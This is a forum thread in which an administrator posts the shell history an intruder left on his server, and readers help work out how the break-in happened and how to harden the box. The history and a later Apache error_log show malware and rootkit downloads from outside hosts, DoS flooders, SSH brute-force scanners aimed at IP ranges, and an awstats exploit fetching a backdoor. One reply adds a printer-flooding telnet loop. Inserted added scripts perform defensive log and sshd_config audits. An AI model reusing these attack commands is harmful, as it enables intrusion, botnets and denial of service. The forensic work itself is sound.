Caught somebody rootkiting me today

21 posts • Page 1 of 1
fergusoa (n00b, Posts: 5, Joined: Mon Nov 08, 2004 12:40 am)

Caught somebody rootkiting me today

Post by fergusoa » Fri Dec 10, 2004 11:52 pm

:oops:

This morning, somebody rootkited a machine I thought was reasonably secure (up-to-date ssh and apache, all other services blocked by shorewall). I discovered the intrusion before they had a chance to delete their .bash_history.

I'll be rebuilding the system (and another one they gained access to), but I'm sorta curious as to what they were up to, and I'm wondering if their history points to any glaring vulnerabilities that I should be aware of.

Any insight would be greatly appreciated!

Code:

w
wget 
cd /tmp
ls -a
uname -a
id
wget ps -x
ps -x
ps -awx
wget www.gas.as.ro/root
rm -rf 404-redirect.html
wget www.grutza.as.ro/root.tar.gz
tar zxvf root.tar.gz
cd root
ls -a
mv root.tar.gz /home
cd 
ls -a
cd /mtp
cd /tmp
mv root.tar.gz /guest
passwd
w
w
cd 
ls -a
wget www.grutza.as.ro/root.tar.gz
tar zxvf root.tar.gz
cd root
./hator
./memo
w
ls -al
./ptrace
w
ls -a
cd
cd root
./pt
./s
cd 
rm -rf root root.tar.gz
cd /tmp
rm -rf root.tar.gz
wget www.grutza.as.ro/vadimII.tgz
tar zxvf vadimII.tgz
./vadimII
./vadimII 208.38.154.110 53
./vadimII 208.38.154.110 53 0
w
ps -x
cd ..
cd /tm,p
cd /tmp
ls -a
rm -rf vadimII vadimII.tgz
wget socks.idilis.ro/flood.tgz
rm -rf blockpage.cgi?ws-session=100716957
wget http://www.funet.fi/pub/crypt/cryptography/pgp-local/old/stealth.tar.gz
tar zxvf stealth.tar.gz
./stealth
cd stealth.c
./stealth.c
make
./stealth
./stealth
ls -al
./stealth 208.38.154.110 53
w
rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth
wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf
vi psybnc.conf
./psybnc
kill -9 6239
vi psybnc.conf
./psybnc
w
netstat -a
ls -a
ps -x
kill -9 6242
w
whois JustBodo.org
w
w
hostaname a
w
w
exit
w
uname -a
cd /tmp
wget www.kriminal.as.ro/bot.tar.gz
tar zxvf bot.tar.gz
cd bot
ls -a
pico mech.set
vi mech.set
vi bbb.usr
./initg
ps -x
kill -9 6408
kill -9 6411 6414
ls -a
cd 
ls -a
cd /tmp
ls -a
rm -rf bot 
rm -rf bot.tar.gz
wget www.grutza.as.ro/mech.tgz
tar zxvf mech.tgz
cd mech
ls -a
pico mech.set
vi mech.set
ls -a
vi ftpusers- 
./mech
ps -x
kill -9 6454 6452
w
ps -x
uname -a
id
w
cd /tmp
ls -al
cd mech
ls -al
less ftpusers- 
less mech.set 
pico ftpusers- 
vi ftpusers- 
vi mech.set 
vi mech.set 
mv mech bash-
./bash- 
./bash- 
./bash- 
passwd
exit
exit
w
ps -awx
w
w
wget 
wget www.grutza.as.ro/stealth
w
w
w
w
w
cd /tmp
l s-a
ftp www.icekid.dap.ro
w
wget wget www.icekid.dap.ro/gas.tar.gz
wget 80.96.205.14/gas.tar.gz
w
w
w
w
exit
a
ls -al
useradd
cd ..
wget www.geocities.com/catalinum/xnet.tar.gz
tar xzvf xnet.tar.gz 
w
uname 0a
uname -a
cd /tmp
ps -x
ls -al
cd .ssh
mkdir .ssh
cd .ssh
wget www.gas.as.ro/root.tar.gz
tar xzvf root.tar.gz 
cd root
./hator 
./memo 
./s
./km3 
ls
./pt
./ptrace 
./e
cd /tmp/.ssh
cd ssh/
mv r00t muie
./muie 212.200 -d 4
cd /tmp
cd .ssh/
cd ssh/
ls -al
./muie 215.125
./muie 215.125 -d 4
./muie 215 -d 4
./muie 212 -d 4
cd /tmp.ssh
cd /tmp..ssh
cd /tmp/.ssh
wget www.geocities.com/dorofteig/em.tar.gz
tar xzvf em.tar.gz 
cdem
cd em
cd emech/
pico emech.users 
vi emech.users 
cat mech.session 
ls
vi mech.session 
./httpd 
./httpd 
exit
cd /tmp
cd .ssh
ls -a
ps -x
kill -9 26396 
kill -9 26398
kill -9 4618
kill -9 4626
cd emech/
ls -a
pico emech.users 
vi emech.users 
./httpd 
./httpd 
./httpd 
cd ..
cd ssh
ls -a
cd ..
wget scanners.go.ro/wow.tgz
wget scanners.go.ro/wow.tgz
./brute
cd ssh/
./brute 
./muie 64.51 -d 4
cd /tmp/ssh
cd /tmp/.ssh
ftp ftp2.megaftpservers.com
ftp ftp2.megaftpservers.com
ls -a
mkdir wow
mv go.sh wow
cd wow
ls -a
cd ..
mv assh wow
mv pscan2  wow
mv ss eoe
mv ss wow
mv assh wow
cd wow
ls
cd ..
mv auto wow
ls -a
mc sshf wow
mv sshf wow
cd wow
ls -a
chmod +_x*
chmod +x *
ls -a
./assh 128.38
./assh 67.121
cd /tmp/.ssh
ls -a
ftp ftp2.megaftpservers.com
w
cd /tmp
cd .ssh
ls -a
rm -rf ssh xnet.tar.gz 
ftp ftp2.megaftpservers.com
cd /tmp
cd " "
ftp ftp2.megaftpservers.com
ls -a
chmod +x 8
chmod +x *
ls -a
wget www.xeofreestyle.com/2000/hybrid.swf
wget www.xeofreestyle.com/2000/hybrid.swf
wget www.xeofreestyle.com/2000/hybrid.swf
ls -a
rm -rf hyb*
ls -a
./assh 212.16
w
id
cat /etc/issue
cd /tmp
ls -a
cd " "
mkdir " "
cd " "
wget
wget lamisto.ws/wow.tgz
ls -a
rm -rf wow.tgz 
rm -rf wow.tar.gz 
wget lamisto.ws/wow.tar.gz
rm -rf wow.tar.gz 
ftp lamisto.ws
ftp ftp.lamisto.ws
ftp ftp2.megaftpservers.com
passwd
cd /tmp
w
who
cd " "
ls -a
./assh 212.16
ls -a
ftp ftp2.megaftpservers.com
cd /tmp
cd " "
ftp ftp.megaftpservers.com
ftp ftp2.megaftpservers.com
ls -a
chmod +x *
./sshf
./assh 212.16
ls -a
./assh 212.17
./assh 216.0
cd /tmp
mkdir " "
cd " "
ls -a
mkdir php
cd php
wget unixshellz.org/sanders/php.tgz
tar xzvf php.tgz 
ftp 212.16.54.197
cd /tmp
ls -a
cd " "
ls -a
cd php
ls -a
ftp sv1.33747.ip.nltree.nl
ftp 63.247.76.5
Petyr (Guru, Posts: 471, Joined: Wed Jan 08, 2003 9:00 am, Location: San Diego, CA, USA)

Post by Petyr » Sat Dec 11, 2004 12:23 am

The history basically to me appears to be everything they did after they'd already gained root access. Everything that I read in there (err... skimmed really but yea) points to them getting utils to cover their tracks and whatnot.

You're lucky you caught the bastard in the act. At least you know what he was attempting to do, but as for HOW he did it, that's the mystery. Check out your apache log files and all the other log files (please tell me you didn't format the box yet...)

anyhow, hope you figure out how they did it. I'd be interested to know at least.

hth,
Petyr
hanj (Veteran, Posts: 1500, Joined: Tue Aug 19, 2003 2:11 am)

Post by hanj » Sat Dec 11, 2004 3:23 am

I think you need to look for stuff in apache's access_log and error_log, also your ftp logs. Guessing that he didn't remove history, there is a good chance the useful entries are in there somewhere.

Also, anything left in /tmp?
What's your kernel version?
What were your SSH settings (/etc/ssh/sshd_config)?
There has been a rash of SSH brute force attempts. Did you allow root access from SSH?
Anything fo
Are all user's passwords 'strong'?
Anything in /var/log/auth.log or /var/log/messages?

You may be able to get a time stamp from running last and then grep on logs. Also, for forensic purposes... did you install chkrootkit and rkhunter to figure out possible vulnerabilities... and to see what his root kit(s) have done.

Here is some info on some of the packages he installed.. .

vadimII
FROM: http://www.linuxquestions.org/questions ... 01/2/40902

Finally, about Vadim. From source code of predecessors vadim and vadimI we see vadimII is named after Romanian politician called Corneliu Vadim Tudor. If sniffed on the wire a clue for marking payloads in the source: #define Vadim_STRING "0123456789" which does send(s, Vadim_STRING, Vadim_SIZE, 0); later on. Running strings on the binary reveals text "Vadim v.II[beta release] by Luciffer".
Like sl2, sl3 or slice they are DoS flooders. If unpacked from default archives it'll usually be in the vicinity of more flooders, IRC bouncers, (broadcast address) scanners. If hidden with a LKM like Adore dirs and processes will not show up on reboot.


stealth.c
FROM: http://www.packetstormsecurity.org/linux/modules/
Stealth.c is a Linux 2.2.x kernel module which discards packets that many OS detection tools use to query the TCP/IP stack. Includes logging of the dropped query packets and packets with bogus flags.

psyBNC2.3.1.tar.gz
FROM: http://www.voodoohosting.com/files/psyBNC_Install.txt
Before going through these options, do the following: know the IP of your shell. for example, if you connect to 'your.shell.com', go into mirc and type '/dns your.shell.com' to get the numeric IP. Also, choose a port for the bnc. We recommend some random number that no one will guess. Ok, on to the options:

Listening ports - You have to tell the bnc where to listen. You can have it listen on more than one port on the same IP, on multiple IPs with the same port, etc. For most people, listening on just one port on one IP is adequate. (the psybnc default is 31337)

hanji
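To make hanj's checklist concrete, here is an added example (not posted by anyone in this thread) that runs the two checks a practitioner would do first on /var/log/auth.log: list accepted logins by accounts that are not expected to log in at all, and count failed password attempts per source address to spot brute-force bursts. The log lines, the allowlist (alice, bob), the threshold and the function names (sample_auth_log, unexpected_logins, failed_by_source, login_timestamps) are all constructed for the demo; the addresses are from documentation ranges.

```shell
#!/bin/sh
# Added example for auth.log triage. Nothing here is from the thread; the
# sample log, the allowlist and the threshold are constructed for the demo.

# Constructed sample in OpenSSH syslog format (not a real auth.log).
sample_auth_log() {
    cat <<'EOF'
Dec 10 03:12:01 box sshd[2210]: Failed password for invalid user admin from 203.0.113.44 port 4021 ssh2
Dec 10 03:12:04 box sshd[2212]: Failed password for root from 203.0.113.44 port 4025 ssh2
Dec 10 03:12:07 box sshd[2214]: Failed password for guest from 203.0.113.44 port 4031 ssh2
Dec 10 03:12:10 box sshd[2216]: Accepted password for guest from 203.0.113.44 port 4037 ssh2
Dec 10 03:12:12 box sshd[2218]: Failed password for root from 203.0.113.44 port 4040 ssh2
Dec 10 08:40:22 box sshd[2301]: Accepted publickey for alice from 10.0.0.5 port 51022 ssh2
Dec 10 09:01:13 box sshd[2355]: Failed password for bob from 10.0.0.9 port 51100 ssh2
Dec 10 09:01:20 box sshd[2357]: Accepted password for bob from 10.0.0.9 port 51104 ssh2
EOF
}

# Accounts that are expected to log in interactively (assumption for the demo).
ALLOWED_USERS="alice bob"

# Print "user source" for every accepted login by an account outside the
# allowlist. Reads log text on stdin; handles password and publickey logins.
unexpected_logins() {
    awk -v allowed="$ALLOWED_USERS" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        /sshd\[[0-9]+\]: Accepted / {
            # the user name sits just before "from", the source just after it
            for (i = 1; i <= NF; i++) if ($i == "from") { user = $(i - 1); src = $(i + 1) }
            if (!(user in ok)) print user, src
        }'
}

# Print "source count" for every source with at least $1 failed password
# attempts (default 3), sorted for stable output.
failed_by_source() {
    awk -v t="${1:-3}" '
        /sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") c[$(i + 1)]++
        }
        END { for (s in c) if (c[s] >= t) print s, c[s] }' | sort
}

# Print the timestamp of every accepted login by user $1, so the same
# moment can be grepped for in messages, access_log and so on.
login_timestamps() {
    awk -v u="$1" '
        /sshd\[[0-9]+\]: Accepted / {
            for (i = 1; i <= NF; i++) if ($i == "from" && $(i - 1) == u) print $1, $2, $3
        }'
}

# Report on the constructed sample when run directly.
echo "== accepted logins by accounts outside the allowlist =="
sample_auth_log | unexpected_logins
echo "== sources with 3+ failed password attempts =="
sample_auth_log | failed_by_source 3
echo "== timestamps to grep for: guest =="
sample_auth_log | login_timestamps guest
```

On a real box, replace sample_auth_log with `cat /var/log/auth.log` (or the file your syslog writes sshd messages to) and put every account that should ever log in into ALLOWED_USERS; an accepted login that is not on that list is exactly the signal fergusoa later reports noticing by hand.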
zerojay (Veteran, Posts: 1033, Joined: Sat Aug 09, 2003 8:06 pm)

Post by zerojay » Sat Dec 11, 2004 2:20 pm

I would e-mail the servers that the downloaded files were stored on. There's a good chance that they were compromised as well.
justanothergentoofanatic (Guru, Posts: 337, Joined: Sun Feb 29, 2004 2:14 am)

Post by justanothergentoofanatic » Mon Dec 13, 2004 3:48 am

Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.

-Mike
zerojay (Veteran, Posts: 1033, Joined: Sat Aug 09, 2003 8:06 pm)

Post by zerojay » Mon Dec 13, 2004 4:03 am

justanothergentoofanatic wrote: Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.

-Mike
php and phpBB exploits seem to be rather popular these days.
rshadow (Apprentice, Posts: 176, Joined: Fri Nov 28, 2003 12:09 pm)

Post by rshadow » Mon Dec 13, 2004 7:46 am

I would be interested in not only how you were rooted.. but how did you detect that you were rooted?
fleed (l33t, Posts: 756, Joined: Wed Aug 28, 2002 8:32 am, Location: London)

Post by fleed » Mon Dec 13, 2004 9:52 am

One more request for how they rooted you! I just want to make sure I don't have any vulnerabilities that might lead to the same happening to me.
codemaker (Guru, Posts: 398, Joined: Thu Jun 03, 2004 6:48 pm, Location: Lisboa, Portugal)

Post by codemaker » Mon Dec 13, 2004 10:27 am

DarkStalker wrote:
php and phpBB exploits seem to be rather popular these days.
I heard about phpBB exploits but nothing about php. What exploits are you talking about? Couldn't find any on bugtraq... 8O
rex123 (Apprentice, Posts: 272, Joined: Wed Apr 21, 2004 1:08 pm)

Post by rex123 » Mon Dec 13, 2004 3:52 pm

Is it certain that the attacker had root access? Whose .bash_history is that? If it's root, then how come fergusoa can still access after they've changed the password? Also, if they got root, why are they putting all their files in a world-writable directory (i.e. /tmp)? Also, look how lame they are. Look at the bit where they download a program called "stealth", try to cd to a file, try to run some source code, then realise that the program doesn't do what they are trying to do and delete it all.

I don't know, but it's very possible that they didn't get root access, and the attempted exploits all failed (which is what you would hope, running a vaguely up-to-date Gentoo).

The attack looks extremely similar to one I've seen on a server I manage.

We ended up with a script called assh, which uses pscan2 to find machines running ssh, then tries to brute-force them (but not very hard). We also had a version of emech running and connecting to undernet IRC. No real harm was done, and they only had access for a couple of hours.

If you have a feeble password (e.g. "password", or the same as your username, which was our case) someone will notice, and later use that password to log on. But they don't have root access unless one of their exploits works. In our case they appeared to try to run an exploit that only works for <2.4.10 kernels, so it was no use at all. They also opened a bindshell backdoor that was useless because the port was closed at the firewall.

It's easy to assume the worst, and safest to remove the machine from the network altogether, but I don't think that just because someone has a file called "root" one should assume that the intruder had root access.
fergusoa (n00b, Posts: 5, Joined: Mon Nov 08, 2004 12:40 am)

Thanks for the suggestions

Post by fergusoa » Thu Dec 16, 2004 1:29 pm

I'm fairly certain they gained access through a weak password --- we imported the passwd/shadow definitions from another host, which contained the username/password pair guest/guest! I cannot be sure that they obtained root access, but we've rebuilt the systems regardless.

To answer rshadow's question, the intrusion was spotted in the logs. I noticed that user 'guest' had logged on, and it didn't make any sense.

I've learned my lesson, and I'll be a whole lot more draconian about userspace/password issues in the future! I work with a research group comprised of engineers with non-CS backgrounds, and we've been slowly learning the do's and don'ts of Linux administration --- sometimes the hard way.

Thanks again for all the helpful comments!
Petyr (Guru, Posts: 471, Joined: Wed Jan 08, 2003 9:00 am, Location: San Diego, CA, USA)

Post by Petyr » Thu Dec 16, 2004 4:20 pm

Be happy you work with Engineers rather than Scientists!
<grin>

Petyr
who has had the pleasure of working with scientists for almost 4 years running now...
Mugen096 (n00b, Posts: 15, Joined: Mon Aug 16, 2004 2:04 am)

Post by Mugen096 » Mon Dec 20, 2004 1:47 am

Just curious, but through all of this, I am assuming that the most basic of security steps was taken, that is, to not allow the direct login of root through SSH and to also only allow root to be su'd to by a select few individuals?

Dan
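Mugen096's question, and hanj's earlier one about /etc/ssh/sshd_config, can be answered mechanically. The following is an added example, not posted in this thread, that audits an sshd_config for the settings they name (root login, password authentication, SSH-1 fallback, and whether logins are restricted to named accounts). The two configs are constructed; the defaults assumed for unset keywords (PermitRootLogin yes, PasswordAuthentication yes) are those of OpenSSH releases of the thread's era, and the function names weak_sshd_config, hardened_sshd_config, audit_sshd_config and sshd_finding_count are mine.

```shell
#!/bin/sh
# Added example: audit an sshd_config for the settings discussed in the thread.
# Both configs are constructed; the "unset" defaults assumed below are those of
# OpenSSH releases from the thread's era.

weak_sshd_config() {
    cat <<'EOF'
# constructed: roughly what a box with imported accounts might be running
Port 22
Protocol 2,1
PermitRootLogin yes
PasswordAuthentication yes
#AllowUsers alice
EOF
}

hardened_sshd_config() {
    cat <<'EOF'
# constructed: the same box after tightening
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers alice bob
MaxAuthTries 3
EOF
}

# Read an sshd_config on stdin, print one line per finding, then "findings: N".
# Keywords are case-insensitive, comments are dropped (so a commented-out
# AllowUsers does not count), and like sshd the first value seen for a keyword wins.
audit_sshd_config() {
    awk '
        {
            sub(/#.*/, "")
            if (NF == 0) next
            key = tolower($1); val = tolower($2)
            if (!(key in v)) v[key] = val
        }
        END {
            n = 0
            root = ("permitrootlogin" in v) ? v["permitrootlogin"] : "yes (unset, old default)"
            if (root != "no") { print "PermitRootLogin " root ": direct root login over SSH is allowed; set PermitRootLogin no"; n++ }
            pw = ("passwordauthentication" in v) ? v["passwordauthentication"] : "yes (unset, default)"
            if (pw != "no") { print "PasswordAuthentication " pw ": any weak password is a login; prefer keys"; n++ }
            if (("protocol" in v) && v["protocol"] ~ /1/) { print "Protocol " v["protocol"] ": SSH-1 fallback enabled; set Protocol 2"; n++ }
            if (!("allowusers" in v) && !("allowgroups" in v)) { print "no AllowUsers/AllowGroups: every account with a valid shell can log in"; n++ }
            print "findings: " n
        }'
}

# Just the number of findings, for scripting.
sshd_finding_count() {
    audit_sshd_config | sed -n 's/^findings: //p'
}

echo "== weak config =="
weak_sshd_config | audit_sshd_config
echo "== hardened config =="
hardened_sshd_config | audit_sshd_config
```

Run it as `audit_sshd_config < /etc/ssh/sshd_config` on a live host. The AllowUsers check is the one that would have caught the guest/guest account fergusoa imported: an account that exists in /etc/passwd but is not listed cannot log in over SSH regardless of its password.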
someguy (Guru, Posts: 433, Joined: Thu Jul 10, 2003 2:13 am, Location: (-_-) .::OH_WELL::. (-_-))

Post by someguy » Sat Jan 08, 2005 4:06 am

"There has been a rash of SSH brute force attempts. Did you allow root access from SSH? "
I got rooted and my forum got fubared.
It wasn't SSH, but I think they may have sniffed mine somehow. I didn't really notice it till my daemons started failing.
I have some of what was left in /tmp; it was udp.pl. I think the guy was trying to use my machine for a DDoS system. I give the guy serious respect, though; it has been the only time anything of mine has gotten hacked in almost 10 years. The guy cleaned up after himself. There were some entries in /proc
that I can't figure out, though. I'm about to check auth.log, and I also got his initials in my apache log later on.... still got it, heh:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`
while [ 1 ] ; do echo "*" | telnet ip.of.print.er 9100 ; done
mattman206 (n00b, Posts: 5, Joined: Wed May 12, 2004 1:37 am)

Post by mattman206 » Sat Mar 12, 2005 5:41 pm

I can't help but chuckle at the attacker's lack of Linux skills.

Example:
wget www.gas.as.ro/root
rm -rf 404-redirect.html
wget www.grutza.as.ro/root.tar.gz
If you were really all about trying to get root.tar.gz downloaded, you would have just typed it the first time.
cd /mtp
cd /tmp
Guess they can't type either!
wget www.grutza.as.ro/root.tar.gz
Wait a sec, they already downloaded this once -- why download it again?
wget socks.idilis.ro/flood.tgz
rm -rf blockpage.cgi?ws-session=100716957
Whoops, the file isn't there. Why didn't they check that the file was really there on their local computer before trying to download it on a compromised system and leave tracks?
tar zxvf stealth.tar.gz
./stealth
cd stealth.c
./stealth.c
make
Hmmm, let's try to run a non-existent program, then change directories to a file, then try to run a C file! Oh yeah...what was that program you use to compile a file.......mark, muck, oh! make!
./stealth
./stealth 208.38.154.110 53
rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth
Hmm, guess it needs more command-line arguments. Welp, guess it doesn't work, screw it.
wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf
Oh my goodness, I can't believe that they strung multiple commands together with semi-colons! Now that's getting fancy. Probably just cutting/pasting from someplace.
psybnc.conf
vi psybnc.conf
Yes, let's try to run a configuration file. Oh wait, I have to edit it.

etc. etc. etc.

I can't imagine this attack was anything other than some script kiddie playing around. If you google for some of the commands they typed in, especially the longer ones, you can find pages with step-by-step instructions for doing these kinds of things.

One in particular, containing the psyBNC attempt, has been taken down but is still in the google cache. Unfortunately I don't know Spanish.
http://www.google.com/search?q=cache:fL ... onf+&hl=en

Try googling for some of the other commands the attacker used -- maybe they'll turn up some more interesting clues.

HTH,
Matt
alxcm (n00b, Posts: 5, Joined: Wed Mar 09, 2005 8:12 pm)

Post by alxcm » Sat Mar 12, 2005 9:33 pm

I do understand Spanish.

On a cursory glance, that page is just instructions for setting up psyBNC and doesn't contain anything referencing hacking/rooting. It definitely isn't written for a n00b, since (this is a little strange too) it recommends adding a user by editing /etc/passwd and /etc/group.

If you want me to look it over in a little more detail, just ask ;)

-Alex
Slynix (n00b, Posts: 67, Joined: Sun May 11, 2003 5:44 am)

Post by Slynix » Tue Mar 15, 2005 5:17 am

Someone got vadimII onto my computer over apache :/
a big bear hug
drspewfy (Tux's lil' helper, Posts: 125, Joined: Sat Dec 13, 2003 10:51 pm, Location: Mexico)

Post by drspewfy » Tue Mar 15, 2005 8:33 am

All this stuff was done by a script kiddie.. he just wants his bot and your IP to hide in IRC..

the psyBNC works for IP spoofing.

the emech program.. is just for putting a bot in his IRC channel..
he looks like he won't hurt you.. cuz he just wants the bot, and to spoof his IP...
they are really n00bs, and they don't know almost anything about UNIX..

they just know about rootkits, basic unix commands to run their programs.. and that's it!.. they are kids around 13-16 years old... they just know.. the famous... "./program"

when I was a child.. I did that kind of stuff.. that was 5 or 6 years ago.. now I'm 20.

JUST FORMAT YOUR SYSTEM... and upgrade your system more often..

BUT-..... I'M CURIOUS.. CHECK ALL YOUR logs. how did he ROOT your box ????

set up SNORT, tripwire, snort_inline; also read step by step the security handbook of gentoo.org/doc .. and apply it on your server... ,

Seeya from Mexico
jonaswidarsson (Apprentice, Posts: 273, Joined: Fri Jan 16, 2004 10:39 am, Location: Göteborg, Sweden)

Post by jonaswidarsson » Tue Oct 04, 2005 8:27 am

Hello.
I had vadimII today. Nothing feels like a CPU load of 100.0 caused by some cracker. You should try it some time...

Anyways, here is a strange log I grepped out of apache's error_log.
It seems the hole is in awstats.

Code:

ns tmp # tail /var/log/apache2/error_log -n 500 | grep 203.162.3.145
[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats
[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
[Mon Oct 03 23:09:35 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cgi
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] --23:09:38--  http://www.coiuldefier.com/tback8080
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]            => `tback8080'
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] Resolving www.coiuldefier.com...
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] failed: Host not found.
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] chmod:
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] cannot access `tback8080'
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] : No such file or directory
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: ./tback8080: No such file or directory
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control
[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/stat-cgi
[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] script not found or unable to stat: /usr/share/webapps/awstats/6.1/hostroot/cgi-bin/perl
[Mon Oct 03 23:09:40 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cp
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] --23:09:56--  http://www.ralphy.as.ro/quake
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]            => `quake'
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Resolving www.ralphy.as.ro...
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 193.230.153.133
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Connecting to www.ralphy.as.ro[193.230.153.133]:80...
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] connected.
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] HTTP request sent, awaiting response...
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 200 OK
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Length: 18,204 [text/plain]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]     0K .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] . .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .                                    100%  102.41 KB/s
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 23:09:56 (102.41 KB/s) - `quake' saved [18204/18204]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:57 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control
[Mon Oct 03 23:10:06 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control
[Mon Oct 03 23:14:57 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed
[Mon Oct 03 23:15:06 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed
And it was probably because of this:
http://www.gentoo.org/security/en/glsa/ ... 501-36.xml
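The error_log above is worth reading as a detection pattern: a CGI script's stderr ends up in error_log, so wget's progress banner and `sh: line 1:` messages under a client's address mean that client got a shell to run commands through the web server. As an added example (not posted in the thread, and not part of awstats or Apache), the script below scores each client by such lines and lists the CGI paths that were probed but did not exist. The log lines are constructed in the same Apache 2.0 error_log format as the post, with documentation-range addresses and an .invalid host name; the function names sample_error_log, command_execution_evidence and probed_scripts are mine.

```shell
#!/bin/sh
# Added example: triage an Apache error_log for evidence that a CGI script was
# abused to run shell commands. The sample log is constructed, not real traffic.

sample_error_log() {
    cat <<'EOF'
[Mon Oct 03 23:09:34 2005] [error] [client 203.0.113.7] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
[Mon Oct 03 23:09:35 2005] [error] [client 203.0.113.7] File does not exist: /var/www/localhost/cgi
[Mon Oct 03 23:09:38 2005] [error] [client 203.0.113.7] --23:09:38--  http://dropper.example.invalid/tback8080
[Mon Oct 03 23:09:38 2005] [error] [client 203.0.113.7]            => `tback8080'
[Mon Oct 03 23:09:38 2005] [error] [client 203.0.113.7] sh: line 1: ./tback8080: No such file or directory
[Mon Oct 03 23:09:56 2005] [error] [client 203.0.113.7] 23:09:56 (102.41 KB/s) - `quake' saved [18204/18204]
[Mon Oct 03 23:09:57 2005] [error] [client 203.0.113.7] sh: line 1: fg: no job control
[Mon Oct 03 23:20:01 2005] [error] [client 198.51.100.9] File does not exist: /var/www/localhost/favicon.ico
[Mon Oct 03 23:21:40 2005] [error] [client 198.51.100.9] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
EOF
}

# Print "client count" for every client whose requests left shell or wget
# output in error_log (output a CGI script should never produce). Sorted for
# stable output. The matched message shapes are: a shell error, a wget
# banner, a wget destination line, a wget completion line, and chmod output.
command_execution_evidence() {
    awk '
        match($0, /\[client [^]]+\]/) {
            client = substr($0, RSTART + 8, RLENGTH - 9)
            msg = substr($0, RSTART + RLENGTH + 1)
            if (msg ~ /^sh: line [0-9]+:/ ||
                msg ~ /^--[0-9][0-9]:[0-9][0-9]:[0-9][0-9]-- +/ ||
                msg ~ /^ *=> `/ ||
                msg ~ /saved \[[0-9]+\/[0-9]+\]$/ ||
                msg ~ /^chmod:/)
                hits[client]++
        }
        END { for (c in hits) print c, hits[c] }' | sort
}

# Print "client path" for every request for a CGI script that did not exist.
# The same missing path requested from several clients is a scanner signature.
probed_scripts() {
    awk '
        match($0, /\[client [^]]+\]/) && /script not found or unable to stat: / {
            client = substr($0, RSTART + 8, RLENGTH - 9)
            path = $0; sub(/.*unable to stat: /, "", path)
            print client, path
        }' | sort
}

echo "== clients with command-execution traces =="
sample_error_log | command_execution_evidence
echo "== missing CGI scripts that were requested =="
sample_error_log | probed_scripts
```

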